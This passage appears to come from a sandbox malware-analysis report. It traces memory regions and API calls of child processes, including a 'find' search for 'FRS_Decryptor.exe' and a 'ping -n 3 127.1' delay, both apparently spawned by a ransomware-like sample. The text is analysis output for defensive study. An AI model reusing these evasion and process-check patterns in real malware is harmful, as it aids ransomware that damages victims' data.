= "pagefile_0x000000007ea60000" filename = "" Region: id = 5820 start_va = 0x7eb8a000 end_va = 0x7eb8cfff entry_point = 0x0 region_type = private name = "private_0x000000007eb8a000" filename = "" Region: id = 5833 start_va = 0x3270000 end_va = 0x32affff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 5834 start_va = 0x32b0000 end_va = 0x32effff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 5835 start_va = 0x32f0000 end_va = 0x332ffff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 5836 start_va = 0x3330000 end_va = 0x336ffff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 5837 start_va = 0x73340000 end_va = 0x7335afff entry_point = 0x73340000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 5838 start_va = 0x73370000 end_va = 0x7341afff entry_point = 0x73370000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5839 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5840 start_va = 0x7ea5a000 end_va = 0x7ea5cfff entry_point = 0x0 region_type = private name = "private_0x000000007ea5a000" filename = "" Region: id = 5841 start_va = 0x7ea5d000 end_va = 0x7ea5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea5d000" filename = "" Thread: id = 308 os_tid = 0x6b4 Thread: id = 310 os_tid = 0xb0c Thread: id = 311 os_tid = 0xabc Thread: id = 312 os_tid = 0xb24 Process: id = "112" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x6b696000" os_pid = "0x7f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "110" os_parent_pid = "0x9b0" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5737 start_va = 0xe60000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 5738 start_va = 0xe80000 end_va = 0xe81fff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 5739 start_va = 0xe90000 end_va = 0xe9efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 5740 start_va = 0xea0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 5741 start_va = 0xee0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 5742 start_va = 0xf20000 end_va = 0xf23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 5743 start_va = 0xf30000 end_va = 0xf30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 5744 start_va = 0xf40000 end_va = 0xf41fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 5745 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 5746 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5747 start_va = 0x7f340000 end_va = 0x7f362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f340000" filename = "" Region: id = 5748 start_va = 0x7f363000 end_va = 0x7f363fff entry_point = 0x0 region_type = private name = "private_0x000000007f363000" filename = "" Region: id = 5749 start_va = 0x7f36c000 end_va = 0x7f36efff entry_point = 0x0 region_type = private name = "private_0x000000007f36c000" filename = "" Region: id = 5750 start_va = 0x7f36f000 end_va = 0x7f36ffff entry_point = 0x0 region_type = private name = "private_0x000000007f36f000" filename = "" Region: id = 5751 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5752 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5753 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5754 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5759 start_va = 0x10f0000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 5760 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5761 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5762 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5821 start_va = 0xe60000 end_va = 0xe6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 5822 start_va = 0xe70000 end_va = 0xe73fff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 5823 start_va = 0xe80000 end_va = 0xe83fff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 5824 start_va = 0xf50000 end_va = 0xfcdfff entry_point = 0xf50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5825 start_va = 0x12f0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 5826 start_va = 0x1560000 end_va = 0x156ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 5827 start_va = 0x73360000 end_va = 0x7336efff entry_point = 0x73360000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 5828 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 5829 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5830 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5831 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5832 start_va = 0x7f240000 end_va = 0x7f33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f240000" filename = "" Thread: id = 309 os_tid = 0xb4c Process: id = "113" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x619e2000" os_pid = "0x3d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5842 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 5843 start_va = 0xf30000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 5844 start_va = 0xf50000 end_va = 0xf51fff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 5845 start_va = 0xf60000 end_va = 0xf6efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 5846 start_va = 0xf70000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 5847 start_va = 0xfb0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 5848 start_va = 0xff0000 end_va = 0xff3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 5849 start_va = 0x1000000 end_va = 0x1000fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001000000" filename = "" Region: id = 5850 start_va = 0x1010000 end_va = 0x1011fff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 5851 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5852 start_va = 0x7f0b0000 end_va = 0x7f0d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0b0000" filename = "" Region: id = 5853 start_va = 0x7f0d6000 end_va = 0x7f0d6fff entry_point = 0x0 region_type = private name = "private_0x000000007f0d6000" filename = "" Region: id = 5854 start_va = 0x7f0dc000 end_va = 0x7f0dcfff entry_point = 0x0 region_type = private name = "private_0x000000007f0dc000" filename = "" Region: id = 5855 start_va = 0x7f0dd000 end_va = 0x7f0dffff entry_point = 0x0 region_type = private name = "private_0x000000007f0dd000" filename = "" Region: id = 5856 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5857 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5858 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5859 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5860 start_va = 0x11e0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 5861 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5862 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5863 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5864 start_va = 0xf30000 end_va = 0xf3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 5865 start_va = 0xf40000 end_va = 0xf43fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 5866 start_va = 0x1020000 end_va = 0x109dfff entry_point = 0x1020000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5867 start_va = 0x10a0000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 5868 start_va = 0x1310000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 5869 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 5870 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 5871 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5872 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5873 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5874 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5875 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5876 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5877 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5878 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5879 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5880 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5881 start_va = 0x7efb0000 end_va = 0x7f0affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 5882 start_va = 0x11a0000 end_va = 0x11dffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 5883 start_va = 0x11f0000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 5884 start_va = 0x7f0d9000 end_va = 0x7f0dbfff entry_point = 0x0 region_type = private name = "private_0x000000007f0d9000" filename = "" Region: id = 5885 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 5886 start_va = 0xf50000 end_va = 0xf52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 5887 start_va = 0x1230000 end_va = 0x1230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 5888 start_va = 0x1240000 end_va = 0x1242fff entry_point = 0x1240000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 5889 start_va = 0x1250000 end_va = 0x128ffff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 5890 start_va = 0x1290000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x0000000001290000" filename = "" Region: id = 5891 start_va = 0x7f0d3000 end_va = 0x7f0d5fff entry_point = 0x0 region_type = private name = "private_0x000000007f0d3000" filename = "" Thread: id = 314 os_tid = 0xafc [0112.380] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0112.380] __set_app_type (_Type=0x1) [0112.380] __p__fmode () returned 0x76ea1768 [0112.380] __p__commode () returned 0x76ea176c [0112.380] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0112.380] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0112.380] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.382] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0112.382] _fileno (_File=0x76ea4c28) returned 1 [0112.382] _get_osfhandle (_FileHandle=1) returned 0x28 [0112.382] GetFileType (hFile=0x28) returned 0x2 [0112.382] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef3a0 | out: lpMode=0xfef3a0) returned 0 [0112.382] GetLastError () returned 0x6 [0112.382] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef304, nSize=0x50 | out: lpBuffer="䤐Ċ") returned 0x0 [0112.382] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0112.384] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xfef3bc | out: phkResult=0xfef3bc*=0x88) returned 0x0 [0112.384] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xfef3b0, lpData=0xfef3b8, lpcbData=0xfef3b4*=0x4 | out: lpType=0xfef3b0*=0x0, lpData=0xfef3b8*=0x0, lpcbData=0xfef3b4*=0x4) returned 0x2 [0112.384] RegCloseKey (hKey=0x88) returned 0x0 [0112.384] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xfef380*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xfef3bc | out: ppResult=0xfef3bc*=0x10ac228*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x10a89d0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0112.384] FreeAddrInfoW (pAddrInfo=0x10ac228*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x10a89d0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0112.384] IcmpCreateFile () returned 0x10a6c98 [0112.387] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x10ac188 [0112.387] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x10b5270 [0112.387] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xfef4b8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0112.388] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xfef3b0, nSize=0x0, Arguments=0xfef3ac | out: lpBuffer="竈ċﶀþ┗\x94䰨盪❋") returned 0x14 [0112.389] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0112.389] _fileno (_File=0x76ea4c28) returned 1 [0112.389] _get_osfhandle (_FileHandle=1) returned 0x28 [0112.389] GetFileType (hFile=0x28) returned 0x2 [0112.389] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef374 | out: lpMode=0xfef374) returned 0 [0112.389] GetLastError () returned 0x6 [0112.389] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2d8, nSize=0x50 | out: lpBuffer="þ❋") returned 0x0 [0112.389] _fileno (_File=0x76ea4c28) returned 1 [0112.389] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.389] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.389] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x10b7b00 [0112.389] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x10b7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0112.389] _fileno (_File=0x76ea4c28) returned 1 [0112.389] _write (in: _FileHandle=1, _Buf=0x10b7b00*, _MaxCharCount=0x14 | out: _Buf=0x10b7b00*) returned 20 [0112.389] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0112.389] _fileno (_File=0x76ea4c28) returned 1 [0112.389] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.389] LocalFree (hMem=0x10b7b00) returned 0x0 [0112.389] LocalFree (hMem=0x10b7ac8) returned 0x0 [0112.389] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xfef3b0, nSize=0x0, Arguments=0xfef3ac | out: lpBuffer="竈ċﶀþ▪\x94䰨盪❚") returned 0x18 [0112.389] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0112.389] _fileno (_File=0x76ea4c28) returned 1 [0112.389] _get_osfhandle (_FileHandle=1) returned 0x28 [0112.389] GetFileType (hFile=0x28) returned 0x2 [0112.390] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef374 | out: lpMode=0xfef374) returned 0 [0112.390] GetLastError () returned 0x6 [0112.390] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2d8, nSize=0x50 | out: lpBuffer="þ❚") returned 0x0 [0112.390] _fileno (_File=0x76ea4c28) returned 1 [0112.390] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.390] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0112.390] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x10ac200 [0112.390] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x10ac200, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0112.390] _fileno (_File=0x76ea4c28) returned 1 [0112.390] _write (in: _FileHandle=1, _Buf=0x10ac200*, _MaxCharCount=0x18 | out: _Buf=0x10ac200*) returned 24 [0112.390] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0112.390] _fileno (_File=0x76ea4c28) returned 1 [0112.390] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.390] LocalFree (hMem=0x10ac200) returned 0x0 [0112.390] LocalFree (hMem=0x10b7ac8) returned 0x0 [0112.390] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0112.390] IcmpSendEcho2Ex (in: IcmpHandle=0x10a6c98, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x10ac188, RequestSize=0x20, RequestOptions=0xfef42c, ReplyBuffer=0x10b5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x10b5270) returned 0x1 [0112.391] InetNtopW (in: Family=2, pAddr=0xfef41c, pStringBuf=0xfef544, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0112.391] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xfef3b0, nSize=0x0, Arguments=0xfef3ac | out: lpBuffer="笈ċﶀþ⛔\x94䰨盪✣") returned 0x16 [0112.391] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0112.391] _fileno (_File=0x76ea4c28) returned 1 [0112.391] _get_osfhandle (_FileHandle=1) returned 0x28 [0112.391] GetFileType (hFile=0x28) returned 0x2 [0112.391] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfef374 | out: lpMode=0xfef374) returned 0 [0112.391] GetLastError () returned 0x6 [0112.391] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfef2d8, nSize=0x50 | out: lpBuffer="þ✣") returned 0x0 [0112.391] _fileno (_File=0x76ea4c28) returned 1 [0112.391] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0112.391] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0112.391] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x10b7b40 [0112.391] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x10b7b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0112.391] _fileno (_File=0x76ea4c28) returned 1 [0112.391] _write (in: _FileHandle=1, _Buf=0x10b7b40*, _MaxCharCount=0x16 | out: _Buf=0x10b7b40*) returned 22 [0112.391] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0112.391] _fileno (_File=0x76ea4c28) returned 1 [0112.391] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0112.391] LocalFree (hMem=0x10b7b40) returned 0x0 [0112.391] 